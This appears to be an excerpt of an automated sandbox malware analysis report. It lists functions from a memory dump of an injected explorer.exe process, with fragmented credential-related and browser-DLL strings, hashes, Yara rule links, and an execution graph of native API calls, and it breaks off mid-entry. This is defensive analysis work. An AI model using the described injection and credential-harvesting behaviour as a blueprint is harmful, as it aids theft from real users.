                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                                                      • API String ID: 0-327345718
                                                                                                                                                                                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                                      • Instruction ID: f4b579e2195e444fffb2d24848ff38e20b5e96187f2b6aca40e2fc643fc7b57a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08417E70A18E0D9FCB98EF6880D67ED77E1FB58301F41856EA80ED7300DA39D9418B86
                                                                                                                                                                                                                      Function 10471432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .dll$el32$h$kern
                                                                                                                                                                                                                      • API String ID: 0-4264704552
                                                                                                                                                                                                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                                      • Instruction ID: 75b97b5ff0ef4cb72fd7a6b9d9ec94100d4f90a30273e1ed7a06dc75c7835cb3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7418170608B498FD7A8CF2980C53EAB7E1FB98304F108B6E959EC3265DB74D945CB81
                                                                                                                                                                                                                      Function 104780B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                                                                                                                      • API String ID: 0-3434893486
                                                                                                                                                                                                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                                      • Instruction ID: d115dd39aac73293ea7b031577e8ad45af7843523fe9b2b11aecac5d03f55ec7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F731E27551DB886FD71ADB28C4C56DAB7D0FB84300F90892EE49BC7252EE34A54ACB43
                                                                                                                                                                                                                      Function 104780C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                                                                                                                      • API String ID: 0-3434893486
                                                                                                                                                                                                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                                      • Instruction ID: b5e53bcf1af472cc60585d25c9cc0b0e372b94298a01ed76931240a86b75751a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0531F275518B486FD719DB28C4C56EAB7E4FB94300F40892EE49BC3252EE34E506CA43
                                                                                                                                                                                                                      Function 10473FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                                                      • API String ID: 0-3136806129
                                                                                                                                                                                                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                                                      • Instruction ID: c1618f9c0875f3701dcc4a190485d8336c59929005987cad5ad65a4718e516e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E319075118B488FC784EF2884D5BEA77E1FBD4304F85862DA44AC7215DF34E905C792
                                                                                                                                                                                                                      Function 10473FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                                                      • API String ID: 0-3136806129
                                                                                                                                                                                                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                                                      • Instruction ID: 7c2c41711e6a8da576702d1f62bc943b53aab5259c30f3986b681e1ba71edd55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F319E75118B488FC784EF2884D5BEA77E1FBD8304F85862DA44ACB215DF34E901C792
                                                                                                                                                                                                                      Function 104768C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                      • API String ID: 0-319646191
                                                                                                                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                                      • Instruction ID: 24eb784f6771cd0c570f89aa08fad7390a7d93e6fdbc2932b19200d5ade32d5d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD31B171614A4C8BCB44EFA8C8857EEBBE1FB58218F40422EE55ED7240DE789645C789
                                                                                                                                                                                                                      Function 104768BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                      • API String ID: 0-319646191
                                                                                                                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                      • Instruction ID: 339d88e287d75bcf2e0450b4645e64c5a8a6d59ead3e361463b847df0277e7c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D921D271610A4C8BCB04EFA8C8857EDBBF5FF58208F40822EE45AD7240DF789605C789
                                                                                                                                                                                                                      Function 10477E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .$l$l$t
                                                                                                                                                                                                                      • API String ID: 0-168566397
                                                                                                                                                                                                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                                      • Instruction ID: 41377c2ff05b0e6c8a6daa79e1725cc24101254b334bb164eb107f5f4412b93a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC216D74A24A0D9BDB44EFB8D0857EDBBF1FB58304F50862DE149E3600DB78A551CB84
                                                                                                                                                                                                                      Function 10477E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .$l$l$t
                                                                                                                                                                                                                      • API String ID: 0-168566397
                                                                                                                                                                                                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                                      • Instruction ID: 1c2fa138b1f47833f6554483c988ce947259918ca21f3a918cda1f00ca522a1b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F215C74A24A0D9FDB44EFA8D0857EEBAF1FB58304F50862EE149E3610DB78A551CB84
                                                                                                                                                                                                                      Function 10477FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: auth$logi$pass$user
                                                                                                                                                                                                                      • API String ID: 0-2393853802
                                                                                                                                                                                                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                                      • Instruction ID: 4dbda70261b612f9f45cb8c57f9c763d5a5bc4beeb0050476c47a8acf1619712
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E421FD30624B0D8BCB01DF9988816DEB7F1EF88344F01861DE44AEB345D7B4E9058BC2

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:1.6%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:6.8%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:620
                                                                                                                                                                                                                      Total number of Limit Nodes:75
                                                                                                                                                                                                                      execution_graph 113372 2a19050 113375 2a1908b 113372->113375 113383 2a1bd10 113372->113383 113374 2a1916c 113375->113374 113386 2a0acf0 113375->113386 113379 2a190f0 Sleep 113380 2a190dd 113379->113380 113380->113374 113380->113379 113395 2a18c70 LdrLoadDll 113380->113395 113396 2a18e80 LdrLoadDll 113380->113396 113384 2a1bd3d 113383->113384 113397 2a1a510 113383->113397 113384->113375 113387 2a0ad14 113386->113387 113388 2a0ad1b 113387->113388 113389 2a0ad5d LdrLoadDll 113387->113389 113390 2a14e50 113388->113390 113389->113388 113391 2a14e6a 113390->113391 113392 2a14e5e 113390->113392 113391->113380 113392->113391 113404 2a152d0 LdrLoadDll 113392->113404 113394 2a14fbc 113394->113380 113395->113380 113396->113380 113398 2a1a52c NtAllocateVirtualMemory 113397->113398 113400 2a1af30 113397->113400 113398->113384 113401 2a1af40 113400->113401 113402 2a1af62 113400->113402 113403 2a14e50 LdrLoadDll 113401->113403 113402->113398 113403->113402 113404->113394 113405 2a1f0fd 113408 2a1b9a0 113405->113408 113409 2a1b9c6 113408->113409 113416 2a09d40 113409->113416 113411 2a1b9d2 113412 2a1b9f6 113411->113412 113424 2a08f30 113411->113424 113462 2a1a680 113412->113462 113465 2a09c90 113416->113465 113418 2a09d4d 113419 2a09d54 113418->113419 113477 2a09c30 113418->113477 113419->113411 113425 2a08f57 113424->113425 113871 2a0b1c0 113425->113871 113427 2a08f69 113875 2a0af10 113427->113875 113429 2a08f86 113435 2a08f8d 113429->113435 113946 2a0ae40 LdrLoadDll 113429->113946 113432 2a08ffc 113891 2a0f410 113432->113891 113434 2a09006 113436 2a1bf60 2 API calls 113434->113436 113457 2a090f2 113434->113457 113435->113457 113879 2a0f380 113435->113879 113437 2a0902a 113436->113437 113438 2a1bf60 2 API calls 113437->113438 113439 2a0903b 113438->113439 113440 2a1bf60 2 API calls 113439->113440 113441 2a0904c 113440->113441 113903 2a0ca90 113441->113903 113443 2a09059 113444 2a14a50 8 API calls 113443->113444 113445 2a09066 113444->113445 113446 2a14a50 8 API calls 113445->113446 113447 2a09077 113446->113447 113448 2a09084 113447->113448 113449 2a090a5 113447->113449 113913 2a0d620 113448->113913 113450 2a14a50 8 API calls 113449->113450 113454 2a090c1 113450->113454 113461 2a090e9 113454->113461 113947 2a0d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 113454->113947 113455 2a08d00 23 API calls 113455->113457 113456 2a09092 113929 2a08d00 113456->113929 113457->113412 113461->113455 113463 2a1af30 LdrLoadDll 113462->113463 113464 2a1a69f 113463->113464 113466 2a09ca3 113465->113466 113516 2a18b90 LdrLoadDll 113465->113516 113496 2a18a40 113466->113496 113469 2a09cb6 113469->113418 113470 2a09cac 113470->113469 113499 2a1b280 113470->113499 113472 2a09cf3 113472->113469 113510 2a09ab0 113472->113510 113474 2a09d13 113517 2a09620 LdrLoadDll 113474->113517 113476 2a09d25 113476->113418 113478 2a09c4a 113477->113478 113479 2a1b570 LdrLoadDll 113477->113479 113850 2a1b570 113478->113850 113479->113478 113482 2a1b570 LdrLoadDll 113483 2a09c71 113482->113483 113484 2a0f180 113483->113484 113485 2a0f199 113484->113485 113854 2a0b040 113485->113854 113487 2a0f1ac 113858 2a1a1b0 113487->113858 113491 2a0f1d2 113492 2a0f1fd 113491->113492 113864 2a1a230 113491->113864 113493 2a1a460 2 API calls 113492->113493 113495 2a09d65 113493->113495 113495->113411 113518 2a1a5d0 113496->113518 113500 2a1b299 113499->113500 113521 2a14a50 113500->113521 113502 2a1b2b1 113503 2a1b2ba 113502->113503 113560 2a1b0c0 113502->113560 113503->113472 113505 2a1b2ce 113505->113503 113578 2a19ed0 113505->113578 113828 2a07ea0 113510->113828 113512 2a09ad1 113512->113474 113513 2a09aca 113513->113512 113841 2a08160 113513->113841 113516->113466 113517->113476 113519 2a1af30 LdrLoadDll 113518->113519 113520 2a18a55 113519->113520 113520->113470 113522 2a14d85 113521->113522 113523 2a14a64 113521->113523 113522->113502 113523->113522 113586 2a19c20 113523->113586 113526 2a14b90 113589 2a1a330 113526->113589 113527 2a14b73 113646 2a1a430 LdrLoadDll 113527->113646 113530 2a14b7d 113530->113502 113531 2a14bb7 113532 2a1bd90 2 API calls 113531->113532 113535 2a14bc3 113532->113535 113533 2a14d49 113534 2a1a460 2 API calls 113533->113534 113537 2a14d50 113534->113537 113535->113530 113535->113533 113536 2a14d5f 113535->113536 113540 2a14c52 113535->113540 113655 2a14790 LdrLoadDll NtReadFile NtClose 113536->113655 113537->113502 113539 2a14d72 113539->113502 113541 2a14cb9 113540->113541 113543 2a14c61 113540->113543 113541->113533 113542 2a14ccc 113541->113542 113648 2a1a2b0 113542->113648 113545 2a14c66 113543->113545 113546 2a14c7a 113543->113546 113647 2a14650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 113545->113647 113549 2a14c97 113546->113549 113550 2a14c7f 113546->113550 113549->113537 113604 2a14410 113549->113604 113592 2a146f0 113550->113592 113553 2a14c70 113553->113502 113554 2a14c8d 113554->113502 113556 2a14d2c 113652 2a1a460 113556->113652 113557 2a14caf 113557->113502 113559 2a14d38 113559->113502 113562 2a1b0d1 113560->113562 113561 2a1b0e3 113561->113505 113562->113561 113563 2a1bd10 2 API calls 113562->113563 113564 2a1b104 113563->113564 113673 2a14070 113564->113673 113566 2a1b150 113566->113505 113567 2a1b127 113567->113566 113568 2a14070 3 API calls 113567->113568 113570 2a1b149 113568->113570 113570->113566 113705 2a15390 113570->113705 113571 2a1b1da 113572 2a1b1ea 113571->113572 113799 2a1aed0 LdrLoadDll 113571->113799 113715 2a1ad40 113572->113715 113575 2a1b218 113794 2a19e90 113575->113794 113579 2a19eec 113578->113579 113580 2a1af30 LdrLoadDll 113578->113580 113822 4ad2c0a 113579->113822 113580->113579 113581 2a19f07 113583 2a1bd90 113581->113583 113825 2a1a640 113583->113825 113585 2a1b329 113585->113472 113587 2a1af30 LdrLoadDll 113586->113587 113588 2a14b44 113587->113588 113588->113526 113588->113527 113588->113530 113590 2a1a34c NtCreateFile 113589->113590 113591 2a1af30 LdrLoadDll 113589->113591 113590->113531 113591->113590 113593 2a1470c 113592->113593 113594 2a1a2b0 LdrLoadDll 113593->113594 113595 2a1472d 113594->113595 113596 2a14734 113595->113596 113597 2a14748 113595->113597 113598 2a1a460 2 API calls 113596->113598 113599 2a1a460 2 API calls 113597->113599 113600 2a1473d 113598->113600 113601 2a14751 113599->113601 113600->113554 113656 2a1bfa0 LdrLoadDll RtlAllocateHeap 113601->113656 113603 2a1475c 113603->113554 113605 2a1445b 113604->113605 113606 2a1448e 113604->113606 113608 2a1a2b0 LdrLoadDll 113605->113608 113607 2a145d9 113606->113607 113611 2a144aa 113606->113611 113609 2a1a2b0 LdrLoadDll 113607->113609 113610 2a14476 113608->113610 113616 2a145f4 113609->113616 113612 2a1a460 2 API calls 113610->113612 113613 2a1a2b0 LdrLoadDll 113611->113613 113614 2a1447f 113612->113614 113615 2a144c5 113613->113615 113614->113557 113618 2a144e1 113615->113618 113619 2a144cc 113615->113619 113669 2a1a2f0 LdrLoadDll 113616->113669 113622 2a144e6 113618->113622 113623 2a144fc 113618->113623 113621 2a1a460 2 API calls 113619->113621 113620 2a1462e 113624 2a1a460 2 API calls 113620->113624 113625 2a144d5 113621->113625 113626 2a1a460 2 API calls 113622->113626 113631 2a14501 113623->113631 113657 2a1bf60 113623->113657 113627 2a14639 113624->113627 113625->113557 113628 2a144ef 113626->113628 113627->113557 113628->113557 113640 2a14513 113631->113640 113660 2a1a3e0 113631->113660 113632 2a14567 113633 2a1457e 113632->113633 113668 2a1a270 LdrLoadDll 113632->113668 113635 2a14585 113633->113635 113636 2a1459a 113633->113636 113638 2a1a460 2 API calls 113635->113638 113637 2a1a460 2 API calls 113636->113637 113639 2a145a3 113637->113639 113638->113640 113641 2a145cf 113639->113641 113663 2a1bb60 113639->113663 113640->113557 113641->113557 113643 2a145ba 113644 2a1bd90 2 API calls 113643->113644 113645 2a145c3 113644->113645 113645->113557 113646->113530 113647->113553 113649 2a1af30 LdrLoadDll 113648->113649 113650 2a14d14 113649->113650 113651 2a1a2f0 LdrLoadDll 113650->113651 113651->113556 113653 2a1af30 LdrLoadDll 113652->113653 113654 2a1a47c NtClose 113653->113654 113654->113559 113655->113539 113656->113603 113670 2a1a600 113657->113670 113659 2a1bf78 113659->113631 113661 2a1af30 LdrLoadDll 113660->113661 113662 2a1a3fc NtReadFile 113661->113662 113662->113632 113664 2a1bb84 113663->113664 113665 2a1bb6d 113663->113665 113664->113643 113665->113664 113666 2a1bf60 2 API calls 113665->113666 113667 2a1bb9b 113666->113667 113667->113643 113668->113633 113669->113620 113671 2a1af30 LdrLoadDll 113670->113671 113672 2a1a61c RtlAllocateHeap 113671->113672 113672->113659 113674 2a14081 113673->113674 113675 2a14089 113673->113675 113674->113567 113704 2a1435c 113675->113704 113800 2a1cf00 113675->113800 113677 2a140dd 113678 2a1cf00 2 API calls 113677->113678 113681 2a140e8 113678->113681 113679 2a14136 113682 2a1cf00 2 API calls 113679->113682 113681->113679 113808 2a1cfa0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 113681->113808 113809 2a1d030 113681->113809 113684 2a1414a 113682->113684 113685 2a141a7 113684->113685 113687 2a1d030 3 API calls 113684->113687 113686 2a1cf00 2 API calls 113685->113686 113688 2a141bd 113686->113688 113687->113684 113689 2a141fa 113688->113689 113692 2a1d030 3 API calls 113688->113692 113690 2a1cf00 2 API calls 113689->113690 113691 2a14205 113690->113691 113693 2a1d030 3 API calls 113691->113693 113699 2a1423f 113691->113699 113692->113688 113693->113691 113696 2a1cf60 2 API calls 113697 2a1433e 113696->113697 113698 2a1cf60 2 API calls 113697->113698 113700 2a14348 113698->113700 113805 2a1cf60 113699->113805 113701 2a1cf60 2 API calls 113700->113701 113702 2a14352 113701->113702 113703 2a1cf60 2 API calls 113702->113703 113703->113704 113704->113567 113706 2a153a1 113705->113706 113707 2a14a50 8 API calls 113706->113707 113709 2a153b7 113707->113709 113708 2a1540a 113708->113571 113709->113708 113710 2a153f2 113709->113710 113711 2a15405 113709->113711 113712 2a1bd90 2 API calls 113710->113712 113713 2a1bd90 2 API calls 113711->113713 113714 2a153f7 113712->113714 113713->113708 113714->113571 113815 2a1ac00 113715->113815 113717 2a1ad54 113718 2a1ac00 LdrLoadDll 113717->113718 113719 2a1ad5d 113718->113719 113720 2a1ac00 LdrLoadDll 113719->113720 113721 2a1ad66 113720->113721 113722 2a1ac00 LdrLoadDll 113721->113722 113723 2a1ad6f 113722->113723 113724 2a1ac00 LdrLoadDll 113723->113724 113725 2a1ad78 113724->113725 113726 2a1ac00 LdrLoadDll 113725->113726 113727 2a1ad81 113726->113727 113728 2a1ac00 LdrLoadDll 113727->113728 113729 2a1ad8d 113728->113729 113730 2a1ac00 LdrLoadDll 113729->113730 113731 2a1ad96 113730->113731 113732 2a1ac00 LdrLoadDll 113731->113732 113733 2a1ad9f 113732->113733 113734 2a1ac00 LdrLoadDll 113733->113734 113735 2a1ada8 113734->113735 113736 2a1ac00 LdrLoadDll 113735->113736 113737 2a1adb1 113736->113737 113738 2a1ac00 LdrLoadDll 113737->113738 113739 2a1adba 113738->113739 113740 2a1ac00 LdrLoadDll 113739->113740 113741 2a1adc6 113740->113741 113742 2a1ac00 LdrLoadDll 113741->113742 113743 2a1adcf 113742->113743 113744 2a1ac00 LdrLoadDll 113743->113744 113745 2a1add8 113744->113745 113746 2a1ac00 LdrLoadDll 113745->113746 113747 2a1ade1 113746->113747 113748 2a1ac00 LdrLoadDll 113747->113748 113749 2a1adea 113748->113749 113750 2a1ac00 LdrLoadDll 113749->113750 113751 2a1adf3 113750->113751 113752 2a1ac00 LdrLoadDll 113751->113752 113753 2a1adff 113752->113753 113754 2a1ac00 LdrLoadDll 113753->113754 113755 2a1ae08 113754->113755 113756 2a1ac00 LdrLoadDll 113755->113756 113757 2a1ae11 113756->113757 113758 2a1ac00 LdrLoadDll 113757->113758 113759 2a1ae1a 113758->113759 113760 2a1ac00 LdrLoadDll 113759->113760 113761 2a1ae23 113760->113761 113762 2a1ac00 LdrLoadDll 113761->113762 113763 2a1ae2c 113762->113763 113764 2a1ac00 LdrLoadDll 113763->113764 113765 2a1ae38 113764->113765 113766 2a1ac00 LdrLoadDll 113765->113766 113767 2a1ae41 113766->113767 113768 2a1ac00 LdrLoadDll 113767->113768 113769 2a1ae4a 113768->113769 113770 2a1ac00 LdrLoadDll 113769->113770 113771 2a1ae53 113770->113771 113772 2a1ac00 LdrLoadDll 113771->113772 113773 2a1ae5c 113772->113773 113774 2a1ac00 LdrLoadDll 113773->113774 113775 2a1ae65 113774->113775 113776 2a1ac00 LdrLoadDll 113775->113776 113777 2a1ae71 113776->113777 113778 2a1ac00 LdrLoadDll 113777->113778 113779 2a1ae7a 113778->113779 113780 2a1ac00 LdrLoadDll 113779->113780 113781 2a1ae83 113780->113781 113782 2a1ac00 LdrLoadDll 113781->113782 113783 2a1ae8c 113782->113783 113784 2a1ac00 LdrLoadDll 113783->113784 113785 2a1ae95 113784->113785 113786 2a1ac00 LdrLoadDll 113785->113786 113787 2a1ae9e 113786->113787 113788 2a1ac00 LdrLoadDll 113787->113788 113789 2a1aeaa 113788->113789 113790 2a1ac00 LdrLoadDll 113789->113790 113791 2a1aeb3 113790->113791 113792 2a1ac00 LdrLoadDll 113791->113792 113793 2a1aebc 113792->113793 113793->113575 113795 2a1af30 LdrLoadDll 113794->113795 113796 2a19eac 113795->113796 113821 4ad2df0 LdrInitializeThunk 113796->113821 113797 2a19ec3 113797->113505 113799->113572 113801 2a1cf10 113800->113801 113802 2a1cf16 113800->113802 113801->113677 113803 2a1bf60 2 API calls 113802->113803 113804 2a1cf3c 113803->113804 113804->113677 113806 2a1bd90 2 API calls 113805->113806 113807 2a14334 113806->113807 113807->113696 113808->113681 113810 2a1cfa0 113809->113810 113811 2a1bf60 2 API calls 113810->113811 113813 2a1cffd 113810->113813 113812 2a1cfda 113811->113812 113814 2a1bd90 2 API calls 113812->113814 113813->113681 113814->113813 113816 2a1ac1b 113815->113816 113817 2a14e50 LdrLoadDll 113816->113817 113818 2a1ac3b 113817->113818 113819 2a14e50 LdrLoadDll 113818->113819 113820 2a1ace7 113818->113820 113819->113820 113820->113717 113820->113820 113821->113797 113823 4ad2c1f LdrInitializeThunk 113822->113823 113824 4ad2c11 113822->113824 113823->113581 113824->113581 113826 2a1a65c RtlFreeHeap 113825->113826 113827 2a1af30 LdrLoadDll 113825->113827 113826->113585 113827->113826 113829 2a07eb0 113828->113829 113830 2a07eab 113828->113830 113831 2a1bd10 2 API calls 113829->113831 113830->113513 113834 2a07ed5 113831->113834 113832 2a07f38 113832->113513 113833 2a19e90 2 API calls 113833->113834 113834->113832 113834->113833 113835 2a07f3e 113834->113835 113840 2a1bd10 2 API calls 113834->113840 113844 2a1a590 113834->113844 113836 2a07f64 113835->113836 113838 2a1a590 2 API calls 113835->113838 113836->113513 113839 2a07f55 113838->113839 113839->113513 113840->113834 113842 2a1a590 2 API calls 113841->113842 113843 2a0817e 113842->113843 113843->113474 113845 2a1af30 LdrLoadDll 113844->113845 113846 2a1a5ac 113845->113846 113849 4ad2c70 LdrInitializeThunk 113846->113849 113847 2a1a5c3 113847->113834 113849->113847 113851 2a1b593 113850->113851 113852 2a0acf0 LdrLoadDll 113851->113852 113853 2a09c5b 113852->113853 113853->113482 113855 2a0b063 113854->113855 113857 